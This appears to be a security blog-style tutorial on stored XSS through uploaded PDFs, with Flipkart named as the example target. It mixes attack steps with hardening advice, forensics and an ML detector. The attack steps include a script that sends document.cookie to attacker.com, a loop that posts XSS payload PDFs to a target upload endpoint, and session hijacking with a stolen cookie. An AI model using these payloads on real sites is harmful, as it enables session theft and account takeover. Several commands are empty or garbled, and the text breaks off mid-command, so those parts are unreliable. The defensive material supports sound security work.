Exclusive: Hidden Scripts in PDFs Bypass Flipkart’s Security – Your Files Are Not Safe! + Video

Introduction:

Stored Cross-Site Scripting (XSS) remains one of the most dangerous web vulnerabilities, allowing attackers to inject malicious scripts into trusted websites. A recent discovery on Flipkart’s PDF upload feature reveals that even mature platforms fail to sanitize file‑based inputs properly, enabling attackers to execute arbitrary JavaScript when a victim accesses an infected document. This oversight turns seemingly harmless file upload forms into potent attack vectors for session hijacking and account takeover.

Learning Objectives:

  • Understand how a malicious PDF can be crafted to trigger stored XSS.
  • Learn to test file upload endpoints for content‑based injection flaws.
  • Implement defensive controls such as strict sanitization, CSP, and secure document viewers.

You Should Know:

  1. Crafting a Malicious PDF Payload – Exploiting Trust in File Processing

Attackers exploit the fact that many web applications store and serve PDFs without stripping embedded JavaScript. When the PDF is rendered in the browser (via native viewers or plugins) from the site's own origin, the script can run; how much it can reach depends on the viewer, because built-in viewers such as PDF.js and PDFium sandbox PDF JavaScript. Below is a step‑by‑step guide to creating a proof‑of‑concept PDF payload using common Linux and Windows tools.

Step‑by‑step guide (Linux/macOS):

1. Install required tools:

`sudo apt install exiftool qpdf texlive-extra-utils`

(On Windows, use WSL or download `exiftool.exe` and `qpdf` binaries.)

  2. Generate a basic PDF with embedded JavaScript using exiftool:

`exiftool -=’‘ innocent.pdf`

This injects the script into the PDF metadata. Many applications blindly render metadata fields.

  3. For more reliable execution, the script must be a document-level JavaScript action rather than a metadata value. `qpdf` can embed a script file as an attachment, but an attachment alone does not run when the document opens:
    echo 'var payload = "<script>document.location=\"http://attacker.com/steal?cookie=\"+document.cookie</script>";' > inject.js
    qpdf original.pdf --add-attachment inject.js -- malicious.pdf
    

4. Alternatively, use `python` with `pypdf`:

    from pypdf import PdfWriter

    # Build a one-page PDF carrying a document-level JavaScript action
    writer = PdfWriter()
    writer.add_blank_page(width=200, height=200)
    writer.add_js('app.alert("XSS from PDF");')
    with open("malicious.pdf", "wb") as f:
        writer.write(f)

  5. Upload the resulting PDF to the target’s file upload endpoint (e.g., profile picture, invoice upload, support ticket). If the application stores and later renders the PDF in‑browser without sanitization, the alert (or cookie stealer) will fire.

Windows alternative:

Use `Adobe Acrobat Pro` → “JavaScript” tool → Add doc-level script, then save. Test upload.

  2. Testing for Stored XSS in File Uploads – Manual and Automated Methods

Before exploiting, security researchers must identify vulnerable file upload parameters. This section covers reconnaissance and detection techniques.

Step‑by‑step guide:

  1. Intercept upload request with Burp Suite (or OWASP ZAP):

– Set proxy to intercept POST requests to /upload, /submit, or /api/file.
– Observe Content-Type: multipart/form-data. The filename and file content are your injection points.

  2. Replace file content with a minimal HTML/XSS string (if the endpoint accepts text files as PDF – uncommon but possible). For PDFs, embed the payload as metadata as shown above.

3. Automate scanning with custom scripts:

    # Linux: generate one variant per metadata field
    for field in Author Subject Keywords; do
      exiftool -"$field"='<script>alert("XSS")</script>' -o "payload_$field.pdf" base.pdf
      curl -X POST -F "file=@payload_$field.pdf" https://target.com/upload
    done

  4. Monitor for execution: After upload, retrieve the file URL from the server’s response (e.g., "location": "/uploads/abc123.pdf"). Open it in a browser with developer tools (F12) and check if the script runs.

  5. Advanced – use `polyglot` files: A PDF/HTML polyglot where the file is both a valid PDF and an HTML document. Tools like `polyglotmaker` can create files that execute JavaScript when loaded by browser PDF viewers.
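The monitoring step can be complemented by checking how the server delivers the stored file, since the response headers decide whether a browser renders it inline. The sketch below is a minimal illustration, not a complete audit: the function name `audit_pdf_response_headers` and the choice of checks are assumptions made for this example, and it only inspects a header dictionary that has already been fetched.

```python
def audit_pdf_response_headers(headers):
    """Return a list of findings for the headers served with an uploaded PDF."""
    # Header names are case-insensitive, so normalize them first.
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []

    # Inline rendering is what lets embedded content run on the site's origin.
    disposition = h.get("content-disposition", "").lower()
    if not disposition.startswith("attachment"):
        findings.append("Content-Disposition is not 'attachment' (file may render inline)")

    # Without nosniff, a browser may reinterpret a polyglot file as HTML.
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options is not 'nosniff'")

    if "content-security-policy" not in h:
        findings.append("No Content-Security-Policy header on the file response")

    content_type = h.get("content-type", "").split(";")[0].strip().lower()
    if content_type != "application/pdf":
        findings.append("Unexpected Content-Type: " + (content_type or "missing"))

    return findings


if __name__ == "__main__":
    # Hypothetical response headers for an uploaded file.
    observed = {"Content-Type": "application/pdf"}
    for finding in audit_pdf_response_headers(observed):
        print(finding)
```

An empty result does not prove the endpoint is safe; it only means these particular delivery headers are in place.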

  3. Mitigation – Hardening File Uploads Against Script Injection

Defenders must assume that all file types can carry malicious code. Implement a defense‑in‑depth strategy.

Step‑by‑step hardening guide:

  1. Content sanitization: Never trust client‑side validation. On the server:

– Convert PDFs to safe images using `ImageMagick` (Linux):
`convert input.pdf -quality 90 output.png` (then serve the PNG instead of the original PDF).
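– Or rewrite the PDF through a sanitizing step that removes `/JavaScript`, `/JS`, `/OpenAction`, and `/AA` entries. `qpdf` can decrypt and normalize the file beforehand, but it has no documented option for stripping JavaScript:

`qpdf --decrypt input.pdf normalized.pdf`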

2. Implement a strict Content Security Policy (CSP):

Add HTTP response header:

`Content-Security-Policy: default-src 'none'; script-src 'none'; object-src 'none'`

When a page embeds a PDF viewer, load it in an `<iframe>` that carries the `sandbox` attribute, and avoid granting `allow-scripts`.

  3. Disable script execution in document viewers: Configure web servers to force download instead of inline rendering:

`Content-Disposition: attachment; filename="file.pdf"`

This keeps the browser from rendering the PDF inline on the site's origin. The file opens in a standalone viewer instead (e.g., Adobe Acrobat), which applies its own security settings.

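  4. Use a Web Application Firewall (WAF) rule that inspects file content for patterns like <script, javascript:, onload=, alert(, etc. For mod_security (Linux Apache), where the `FILES_TMP_CONTENT` collection is only populated when uploaded files are kept (e.g., `SecUploadKeepFiles On`):
    SecRule FILES_TMP_CONTENT "@rx (?i)(<script|javascript:|on\w+=)" \
        "id:123,phase:2,deny,status:403,msg:'Malicious PDF content'"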
    

  5. Validate file type by magic bytes (not just extension):

    # Linux command to check true type
    file -b --mime-type uploaded.pdf
    

    For PDFs, the file must begin with the magic bytes %PDF- and the command should report application/pdf. Reject if mismatched.
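Two of the controls above, the magic-byte check and the forced-download headers, can be sketched server-side in a few lines. This is an illustrative sketch under stated assumptions rather than a complete upload handler: the names `looks_like_pdf` and `safe_pdf_headers` are hypothetical, the check deliberately rejects files with leading junk before the header, and passing it says nothing about what the PDF contains.

```python
PDF_MAGIC = b"%PDF-"


def looks_like_pdf(data: bytes) -> bool:
    """True only if the upload starts with the PDF header (no leading junk allowed)."""
    return data.startswith(PDF_MAGIC)


def safe_pdf_headers(filename: str) -> dict:
    """Build response headers that force a download instead of inline rendering."""
    # Keep ASCII letters, digits, dot, underscore and hyphen so the name
    # cannot break out of the quoted header value.
    safe_name = "".join(
        c for c in filename if c.isascii() and (c.isalnum() or c in "._-")
    ) or "file.pdf"
    return {
        "Content-Type": "application/pdf",
        "Content-Disposition": 'attachment; filename="' + safe_name + '"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; script-src 'none'; object-src 'none'",
    }


if __name__ == "__main__":
    upload = b"%PDF-1.7\n% rest of the file"
    if looks_like_pdf(upload):
        print(safe_pdf_headers("invoice.pdf"))
    else:
        print("rejected: not a PDF")
```

The strict `startswith` test is a design choice: some readers accept a header that appears later in the file, and that tolerance is what PDF/HTML polyglots rely on.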

  4. Exploitation Chain – From File Upload to Account Takeover

Once stored XSS is confirmed, an attacker can chain it with other techniques to compromise accounts.

Step‑by‑step exploitation:

1. Craft a payload that steals session cookies:

``
Embed this inside the PDF (using earlier methods). When any user opens the infected PDF, their cookie is exfiltrated.

  2. Perform session hijacking: Use the stolen cookie in another browser or tool (e.g., EditThisCookie extension or curl):
    `curl --cookie "session=STOLEN_VALUE" https://target.com/profile`

  3. Escalate to account takeover if the session allows password change without re‑authentication. Combine with a CSRF payload inside PDF:

``

  4. Automate the entire attack using a custom Python script that uploads the PDF, extracts the public link, and waits for victim interaction.

  5. Advanced Defense – Using AI to Detect Malicious PDFs

Machine learning models can identify anomalous JavaScript patterns or known exploit structures (e.g., CVE‑2018‑4993). This section introduces a basic detection pipeline.

Step‑by‑step tutorial:

  1. Extract PDF metadata and JavaScript using `peepdf` (Linux); `pdfid` and `pdf-parser` give a similar overview:
    pip install peepdf
    peepdf -C "extract js" malicious.pdf
    

  2. Train a simple classifier with `scikit-learn` on a dataset of benign and malicious PDFs:

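    from sklearn.ensemble import RandomForestClassifier
    # Features: presence of /JavaScript, /JS, /OpenAction, /AA, number of objects
    # X_train (feature rows) and y_train (0 = benign, 1 = malicious) are prepared beforehand
    model = RandomForestClassifier(n_estimators=100, random_state=0)
    model.fit(X_train, y_train)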
    

  3. Deploy as a microservice – On file upload, send the PDF to a containerized ML model that returns a risk score. If score > threshold, reject or sandbox.

  4. Cloud hardening – Use AWS Lambda or Azure Functions to run the ML model serverlessly, scaling automatically.
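The features named in step 2 can be derived from the raw bytes of an upload before any model is involved. The sketch below is a simplified illustration: `extract_features` and `needs_review` are hypothetical names, the rule in `needs_review` is a stand-in for a trained model's score, and plain byte matching will miss names hidden inside compressed object streams or written with hex escapes.

```python
import re

# PDF name tokens that indicate scripts or automatic actions.
SUSPICIOUS_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA")


def extract_features(data: bytes) -> list:
    """Return [count(/JavaScript), count(/JS), count(/OpenAction), count(/AA), object count]."""
    features = []
    for name in SUSPICIOUS_NAMES:
        # The lookahead stops a short name from matching as the prefix of a longer one.
        pattern = re.escape(name.encode("ascii")) + rb"(?![A-Za-z0-9])"
        features.append(len(re.findall(pattern, data)))
    # Indirect objects are introduced as "<number> <generation> obj".
    features.append(len(re.findall(rb"\b\d+\s+\d+\s+obj\b", data)))
    return features


def needs_review(features: list) -> bool:
    """Placeholder rule: flag any file that declares a script or an automatic action."""
    return any(count > 0 for count in features[:4])


if __name__ == "__main__":
    sample = (
        b"%PDF-1.7\n"
        b"1 0 obj\n<< /OpenAction 2 0 R >>\nendobj\n"
        b"2 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj\n"
    )
    row = extract_features(sample)
    print(row, needs_review(row))
```

Rows produced this way can be stacked into the feature matrix passed to a classifier's `fit` method, one row per labeled PDF.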

6. Real‑World Command List for Forensic Analysis

After an incident, examine compromised systems for evidence of PDF XSS exploitation.

Linux commands:

  • Find all PDFs accessed in last 24 hours:

`find /var/www/uploads -name "*.pdf" -atime -1`

  • Grep PDF files for embedded scripts without opening:

`strings .pdf | grep -i “